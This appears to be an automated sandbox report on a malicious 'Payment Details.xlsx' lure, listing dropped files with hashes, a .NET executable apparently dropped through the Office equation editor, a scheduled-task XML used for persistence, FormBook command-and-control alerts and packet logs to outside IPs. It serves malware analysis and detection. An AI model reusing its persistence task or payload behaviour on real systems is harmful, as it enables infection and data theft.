                                    Preview: .PNG........IHDR..............P.l....sRGB.........gAMA......a.....pHYs...t...t..f.x..+.IDATx...|.e............{......z.Y8..Di*E.4*6.@.$$....+!.T.H/..M6..RH.l.R.!AC...>3;3;..4..~...>3.<.<..7.<3..555........c...xo.Z.X.J...Lhv.u.q..C..D......-...#n...!.W..#...x.m..&.S........cG.... s..H.=......,...(((HJJR.s..05J...2m.....=..R..Gs....G.3.z..."............(..1$..)..[..c&t..ZHv..5....3#..~8....Y...............e2...?.0.t.R}ZI..`.&.......rO..U.mK..N.8..C...[..\....G.^y.U.....N.....eff.....A....Z.b.YU....M.j.vC+\.gu..0v..5...fo.....'......^w..y....O.RSS....?.."L.+c.J....ku$._...Av...Z...*Y.0.z..zMsrT.:.<.q.....a.......O.....$2.=|.0.0..A.v..j....h..P.Nv......,.0....z=...I@8m.h.:]..B.q.C.......6...8qB......G\.."L.o..[)..Z.XuJ.pE..Q.u.:..$[K..2.....zM=`.p.Q@.o.LA../.%....EFsk:z...9.z......>z..H,.{{{...C....n..X.b....K.:..2,...C....;.4....f1,G.....p|f6.^._.c..'''Qll..........W.[..s..q+e.:.|..(....aY..yX....}...n.u..8d...L...:B."zuxz..^..m;p..(&&....
                                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\E77F686A.png
                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                    File Type:PNG image data, 600 x 306, 8-bit colormap, non-interlaced
                                    Category:dropped
                                    Size (bytes):42465
                                    Entropy (8bit):7.979580180885764
                                    Encrypted:false
                                    SSDEEP:768:MUC94KctLo6+FkVfaapdydSo7CT3afPFUaV8v9TIzsrZsQ54kvd8gjDsss2Ur6:MJctLo63a8dydV+3WOa+90sZsSyMs+
                                    MD5:C31D090D0B6B5BCA539D0E9DB0C57026
                                    SHA1:D00CEE7AEE3C98505CDF6A17AF0CE28F2C829886
                                    SHA-256:687AFECEE6E6E286714FD267E0F6AC74BCA9AC6469F4983C3EF7168C65182C8D
                                    SHA-512:B23CA96097C2F5ED8CC251C0D6A34F643EE2251FDF3DEF6A962A168D82385CFEE2328D39FF86AADEA5EDBBF4D35882E6CD9CF8ECE43A82BD8F06383876B24756
                                    Malicious:false
                                    Preview: .PNG........IHDR...X...2......?^O..._PLTE.......................................................................gbh................j...^k....-.........................................>Jg......h..m.............l`.......qjG.9\LC..........u.*.'.................//F.......h.++..j...e....A.H?>.......|DG...........G./.`<..G...O:R..j...................................................tRNS.@..f...0IDATx..Z.s.4.]:.".F..Y.5.4!...WhiM..]Cv.Q......e.....x....~...x.g.%K.....X.....brG..sW:~g.Tu...U.R...W.V.U#TAr?..?}.C3.K...P..n..A..av?C..J.}.e.]...CA._y......~.2.^..Z..'...@......)....s.(...ey......{.)e..*]\-..yG2Ne.B....\@q....8.....W./i.C..P.*...O..e..7./..k:..t....]"../...F......y.......0`.3..g.)..Z...tR.bU.].B.Y...Ri^.R......D.*........=(tL.W.y....n.\.s..D.5.....c....8A....:;.)..].a]...;B0...B.0&@*.+..2..4....-X.>)..h~.J..".nO=VV.t...q..5......f.h......DPyJ*....E..:.....K.... ......E.%i..C..V..\.......z.^.r7.V...q.`....3..E3J8Ct.Z.l.GI.).R!b
                                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\EAE7ECFC.png
                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                    File Type:PNG image data, 338 x 143, 8-bit/color RGBA, non-interlaced
                                    Category:dropped
                                    Size (bytes):6364
                                    Entropy (8bit):7.935202367366306
                                    Encrypted:false
                                    SSDEEP:192:joXTTTt+cmcZjbF/z2sA9edfxFHTeDELxExDR:joXTTTEc5ZjR/zI9EfjTeDEGxDR
                                    MD5:A7E2241249BDCC0CE1FAAF9F4D5C32AF
                                    SHA1:3125EA93A379A846B0D414B42975AADB72290EB4
                                    SHA-256:EC022F14C178543347B5F2A31A0BFB8393C6F73C44F0C8B8D19042837D370794
                                    SHA-512:A5A49B2379DF51DF5164315029A74EE41A2D06377AA77D24A24D6ADAFD3721D1B24E5BCCAC72277BF273950905FD27322DBB42FEDA401CA41DD522D0AA30413C
                                    Malicious:false
                                    Preview: .PNG........IHDR...R...........S.....sRGB.........gAMA......a.....pHYs..........o.d...!tEXtCreation Time.2018:08:27 10:23:35Z......DIDATx^....M......3c0f0.2.9o.......-..r..:.V*.ty..MEJ.^.$G.T.AJ.J.n.....0.`...B...g=....{..5.1...|.g.z..Y.._...3k..y............@JD...)..KQ.........f.DD.1.....@JD...)..K..DD.1.....@JD...)..K..DD.1.....@JD...)..K..DD.....9.sdKv.\.R[...k...E..3....ee.!..Wl...E&6.\.]..'K...x.O..%.EE..'...}..[c....?n..R...V..U5!.Rt...-xw*.....#..._....I....k.!":...H.....eKN.....9....{%......*7..6Y..".....P....."ybQ.....JJ`z..%..a.$<m.n'..[.f0~..r.........-.q...{.Mu3.yX...\...5.a.zNX.9..-.[......QU.r .qZ...&.{....$..`.Lu..]Z^'.].k|.z.3....H.../...k7.1>y.D..._x...........=.u.?ee.9.'.11:={.t]....)..k...F@P|f....9...K>...{...}...h9.b..h....w.....A~...u..j.9..x..C=.JJ.h....K2.... .../I..=3C.6k.]...JD.....:tP.e...-+*...}..\.Yrss4...i.f..A7I...u.M....v.uY_.V|.].-Oo..........._.;@c....`.....|.R7>^...j*S...{...w.iV..UR..SJ.hy.W3...2Q@f......,.....
                                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F9EB6C08.png
                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                    File Type:PNG image data, 130 x 176, 8-bit/color RGB, non-interlaced
                                    Category:dropped
                                    Size (bytes):14828
                                    Entropy (8bit):7.9434227607871355
                                    Encrypted:false
                                    SSDEEP:384:zIZYVvfv3ZOxvHe5EmlbliA2r1BMWWTXRRO/QX:Td3Z46xiXzW/kO
                                    MD5:58DD6AF7C438B638A88D107CC87009C7
                                    SHA1:F25E7F2F240DC924A7B48538164A5B3A54E91AC6
                                    SHA-256:9269180C35F7D393AB5B87FB7533C2AAA2F90315E22E72405E67A0CAC4BA453A
                                    SHA-512:C1A3543F221FE7C2B52C84F6A12607AF6DAEF60CCB1476D6D3E957A196E577220801194CABC18D6A9A8269004B732F60E1B227C789A9E95057F282A54DBFC807
                                    Malicious:false
                                    Preview: .PNG........IHDR.............L.!... .IDATx..gp\.y>~v...WTb... ...!.M.H...d.J..3.8.(.L&.lM.d.o..$..q.D.I.....k,J.b3%QD!.Bt,.........p.+.....x?`....{.9o..W.q.Y.gM.g=.5"dm.V..M...iX..6....g=.R(..N'.0&.I(..B2..\...|.t......R.T.......J...Q.U....F.I..B.\...B.Z-....D")..,.J.....u..1.#....A.P.i..!...3.U1....RI..9....:..~..r..N.....Je,...l...(..CCC...v....a.l6KQ...ooo...d.fxx...k``...5.N.\.S.N...e2............b..7..8@.tgg.}..Ue7..e.G .`.J.d2)..B!M..r..T*Q.%..X.......{....,.q.\,.E".........z..*.abbB*...j.\.J.(.b.......|>...........R....L&..X.eYV"..-.R)B.T*M&..pX*.j.Z..9..F.Z.6....b.\./%..~...).B<..T*.z..D"..(...\...d2YKKK...mm.T*..l.T*..I$.x<..J..q..*.J .X..O>...C.d2.JI...:...#....xkk.B.(....D .8..t:..o>...:vC%MNNj.ZHZ....`.T....,...A.....l$.q.\f.....eY..8.+....`dd.b.X,.BH.T..4-..x.EV.|&.p.......O.P(.J.\>66.a.X,...><<....V.R.T*....d2.;v.....W.511.u.a....'..'...zkk.m.t:]__...ggg.o.............Y..z..a.....{..%.H..f...nw*..........'ND"...P(D"... .H..|>/.Hd2....EQ.
                                    C:\Users\user\AppData\Local\Temp\tmpC92A.tmp
                                    Process:C:\Users\Public\vbc.exe
                                    File Type:XML 1.0 document, ASCII text
                                    Category:dropped
                                    Size (bytes):1578
                                    Entropy (8bit):5.108460768399864
                                    Encrypted:false
                                    SSDEEP:24:2di4+S2qhZ1ty1mCUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtwxvn:cgeZQYrFdOFzOzN33ODOiDdKrsuTAv
                                    MD5:5A018129C464113B52BC5573A3B1B93C
                                    SHA1:6F17FA4E34555C3A38D4BCED9FFFFE97C14FF7B0
                                    SHA-256:3DD3408806D339789B8AB7878072025238D4DAD182810DDEBC19CA68569B57E8
                                    SHA-512:B12739C10849BDEE9387E06B943592C2CF6E0A41C88EE1134FD6A3CAA3547CDACE0C7CDB36C3C1A7328BF4418FDB850B0262A09EDA20474DC3264A69998BEA6C
                                    Malicious:true
                                    Preview: <?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvail
                                    C:\Users\user\AppData\Local\Temp\~DF0437710B50B493BA.TMP
                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):512
                                    Entropy (8bit):0.0
                                    Encrypted:false
                                    SSDEEP:3::
                                    MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                    SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                    SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                    SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                    Malicious:false
                                    Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                    C:\Users\user\AppData\Local\Temp\~DF8260883CA3EB749E.TMP
                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                    File Type:CDFV2 Encrypted
                                    Category:dropped
                                    Size (bytes):234600
                                    Entropy (8bit):7.971193076260305
                                    Encrypted:false
                                    SSDEEP:6144:HkrpOY+fhX0Iop0jRpwyDczCg7DZ1PBxdTiRLbqO7:HkrpOJhDo0j7wywzj7DD5/TabT
                                    MD5:F49E322B837835AC60CAD8C173ECFF31
                                    SHA1:C7CDDFBF865B528D1BBBBE5C5F3974279CC8B6F5
                                    SHA-256:FF4E17D62CE9C71164879418E7942CECF8DB37B16CB66ADEBC6C2570840F8524
                                    SHA-512:C5CE7FEB4A44D0A3C0BA17C1104D599409C66C1A36E68F382DF9048E18F02349C16CF4DE21437F988E4779CE56847B9574DD83562DD1239BC88358922E2826B9
                                    Malicious:false
                                    Preview: ......................>................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...
                                    C:\Users\user\AppData\Local\Temp\~DF9A98EC95844A9751.TMP
                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):512
                                    Entropy (8bit):0.0
                                    Encrypted:false
                                    SSDEEP:3::
                                    MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                    SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                    SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                    SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                    Malicious:false
                                    Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                    C:\Users\user\AppData\Local\Temp\~DFBA44D8F3B40A3F94.TMP
                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):512
                                    Entropy (8bit):0.0
                                    Encrypted:false
                                    SSDEEP:3::
                                    MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                    SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                    SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                    SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                    Malicious:false
                                    Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                    C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\R7HWQA7HZJYT21Z3G4UU.temp
                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):8016
                                    Entropy (8bit):3.5846139722878556
                                    Encrypted:false
                                    SSDEEP:96:chQC4MqGqvsqvJCwoBz8hQC4MqGqvsEHyqvJCwor/ztAKrVHypxpyX3lUVLA2:cm7oBz8mvHnor/zt58f8X4A2
                                    MD5:247B62A1E21D993F810B83CF19997157
                                    SHA1:43974401B3DA0E188A101465DC510105D64D7222
                                    SHA-256:A95B81263776693FAAA622A07365AE7FB40F60FE6F0E30E71F1C790AC25B6D8D
                                    SHA-512:B32597386AE62602BCAC5BE6A20FC3731814D8F96D2BF1351D746F0BDC7372CBB49C42A86C59D7E1CAF3AB21F1232FE3E555EE7BC88D1BE8B94355ADAC6EB9D9
                                    Malicious:false
                                    Preview: ...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......S ...Programs..f.......:...S .*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
                                    C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms (copy)
                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):8016
                                    Entropy (8bit):3.5846139722878556
                                    Encrypted:false
                                    SSDEEP:96:chQC4MqGqvsqvJCwoBz8hQC4MqGqvsEHyqvJCwor/ztAKrVHypxpyX3lUVLA2:cm7oBz8mvHnor/zt58f8X4A2
                                    MD5:247B62A1E21D993F810B83CF19997157
                                    SHA1:43974401B3DA0E188A101465DC510105D64D7222
                                    SHA-256:A95B81263776693FAAA622A07365AE7FB40F60FE6F0E30E71F1C790AC25B6D8D
                                    SHA-512:B32597386AE62602BCAC5BE6A20FC3731814D8F96D2BF1351D746F0BDC7372CBB49C42A86C59D7E1CAF3AB21F1232FE3E555EE7BC88D1BE8B94355ADAC6EB9D9
                                    Malicious:false
                                    Preview: ...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......S ...Programs..f.......:...S .*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
                                    C:\Users\user\AppData\Roaming\OmnbtuhFsJys.exe
                                    Process:C:\Users\Public\vbc.exe
                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                    Category:dropped
                                    Size (bytes):723456
                                    Entropy (8bit):7.763310640308659
                                    Encrypted:false
                                    SSDEEP:12288:EBzcmhiTIqqxiWT/niO1/pFbHfi17evEf6BFMmEJWixDw/1LgyHixBFmRq:EBomhikV4WzNpFDfi1gqmwK1syHi1Wq
                                    MD5:0F88779E9500075DE85E916637305164
                                    SHA1:EE1B3AF259E9F03239441681F00AADDD28E4E8FB
                                    SHA-256:C98EAC88F8F4243D7303B806CB58E0A89E33270CB4B33457C91938A2B2746238
                                    SHA-512:ADEFEE155A0579DA0DC75E4AFF162635338150A884DDDDF47C732A67D69E2F56471CDDD64A7CFFB743DEFC040185CE146B713C6511B3DAC709D4956E2D30EA31
                                    Malicious:true
                                    Antivirus:
                                    • Antivirus: ReversingLabs, Detection: 50%
                                    Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...0..a..............0.............~.... ... ....@.. .......................`............@.................................,...O.... .......................@....................................................... ............... ..H............text........ ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B................`.......H........H...!..........\j...............................................s....}.....s ...}.....(!....(.....{.....o"...*.0...........(......}.....-...}....+T.{.....o#...o$...,...{.....o#...o%...}....+(.s&...}.....{.....o#....{....o'....(.....{....,6.{....o(....+...()......(......(*...-...........o.....*..................{....o+....{....o,...o-.....}....*.0..)........{.........(....t......|......(...+...3.*....0..)........{.........(0...t......|......(...+...3.*....0..........
                                    C:\Users\user\Desktop\~$Payment Details.xlsx
                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):165
                                    Entropy (8bit):1.4377382811115937
                                    Encrypted:false
                                    SSDEEP:3:vZ/FFDJw2fV:vBFFGS
                                    MD5:797869BB881CFBCDAC2064F92B26E46F
                                    SHA1:61C1B8FBF505956A77E9A79CE74EF5E281B01F4B
                                    SHA-256:D4E4008DD7DFB936F22D9EF3CC569C6F88804715EAB8101045BA1CD0B081F185
                                    SHA-512:1B8350E1500F969107754045EB84EA9F72B53498B1DC05911D6C7E771316C632EA750FBCE8AD3A82D664E3C65CC5251D0E4A21F750911AE5DC2FC3653E49F58D
                                    Malicious:true
                                    Preview: .user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                    C:\Users\Public\vbc.exe
                                    Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                    Category:dropped
                                    Size (bytes):723456
                                    Entropy (8bit):7.763310640308659
                                    Encrypted:false
                                    SSDEEP:12288:EBzcmhiTIqqxiWT/niO1/pFbHfi17evEf6BFMmEJWixDw/1LgyHixBFmRq:EBomhikV4WzNpFDfi1gqmwK1syHi1Wq
                                    MD5:0F88779E9500075DE85E916637305164
                                    SHA1:EE1B3AF259E9F03239441681F00AADDD28E4E8FB
                                    SHA-256:C98EAC88F8F4243D7303B806CB58E0A89E33270CB4B33457C91938A2B2746238
                                    SHA-512:ADEFEE155A0579DA0DC75E4AFF162635338150A884DDDDF47C732A67D69E2F56471CDDD64A7CFFB743DEFC040185CE146B713C6511B3DAC709D4956E2D30EA31
                                    Malicious:true
                                    Antivirus:
                                    • Antivirus: ReversingLabs, Detection: 50%
                                    Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...0..a..............0.............~.... ... ....@.. .......................`............@.................................,...O.... .......................@....................................................... ............... ..H............text........ ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B................`.......H........H...!..........\j...............................................s....}.....s ...}.....(!....(.....{.....o"...*.0...........(......}.....-...}....+T.{.....o#...o$...,...{.....o#...o%...}....+(.s&...}.....{.....o#....{....o'....(.....{....,6.{....o(....+...()......(......(*...-...........o.....*..................{....o+....{....o,...o-.....}....*.0..)........{.........(....t......|......(...+...3.*....0..)........{.........(0...t......|......(...+...3.*....0..........

                                    Static File Info

                                    General

                                    File type:CDFV2 Encrypted
                                    Entropy (8bit):7.971193076260305
                                    TrID:
                                    • Generic OLE2 / Multistream Compound File (8008/1) 100.00%
                                    File name:Payment Details.xlsx
                                    File size:234600
                                    MD5:f49e322b837835ac60cad8c173ecff31
                                    SHA1:c7cddfbf865b528d1bbbbe5c5f3974279cc8b6f5
                                    SHA256:ff4e17d62ce9c71164879418e7942cecf8db37b16cb66adebc6c2570840f8524
                                    SHA512:c5ce7feb4a44d0a3c0ba17c1104d599409c66c1a36e68f382df9048e18f02349c16cf4de21437f988e4779ce56847b9574dd83562dd1239bc88358922e2826b9
                                    SSDEEP:6144:HkrpOY+fhX0Iop0jRpwyDczCg7DZ1PBxdTiRLbqO7:HkrpOJhDo0j7wywzj7DD5/TabT
                                    File Content Preview:........................>......................................................................................................................................................................................................................................

                                    File Icon

                                    Icon Hash:e4e2aa8aa4b4bcb4

                                    Network Behavior

                                    Snort IDS Alerts

                                    TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                    11/25/21-19:30:53.961180TCP2031453ET TROJAN FormBook CnC Checkin (GET)4916780192.168.2.2252.128.23.153
                                    11/25/21-19:30:53.961180TCP2031449ET TROJAN FormBook CnC Checkin (GET)4916780192.168.2.2252.128.23.153
                                    11/25/21-19:30:53.961180TCP2031412ET TROJAN FormBook CnC Checkin (GET)4916780192.168.2.2252.128.23.153

                                    Network Port Distribution

                                    TCP Packets

                                    TimestampSource PortDest PortSource IPDest IP
                                    Nov 25, 2021 19:29:20.721256971 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:20.958647966 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:20.958758116 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:20.959091902 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:21.195264101 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:21.195287943 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:21.195300102 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:21.195312023 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:21.195483923 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:21.430346966 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:21.430375099 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:21.430387974 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:21.430401087 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:21.430416107 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:21.430432081 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:21.430449009 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:21.430464983 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:21.430645943 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:21.664612055 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:21.664652109 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:21.664664984 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:21.664683104 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:21.664700031 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:21.664716005 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:21.664732933 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:21.664750099 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:21.664767027 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:21.664783955 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:21.664798975 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:21.664814949 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:21.664864063 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:21.664897919 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:21.664901018 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:21.664905071 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:21.664906979 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:21.664910078 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:21.667606115 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:21.898916960 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:21.898942947 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:21.898955107 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:21.898967028 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:21.898979902 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:21.899003983 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:21.899020910 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:21.899038076 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:21.899054050 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:21.899070024 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:21.899081945 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:21.899099112 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:21.899096966 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:21.899116039 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:21.899122000 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:21.899128914 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:21.899132967 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:21.899136066 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:21.899149895 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:21.899152994 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:21.899168015 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:21.899169922 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:21.899184942 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:21.899187088 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:21.899200916 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:21.899202108 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:21.899218082 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:21.899218082 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:21.899231911 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:21.899235010 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:21.899249077 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:21.899251938 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:21.899264097 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:21.899269104 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:21.899280071 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:21.899286032 CET8049165202.55.132.154192.168.2.22
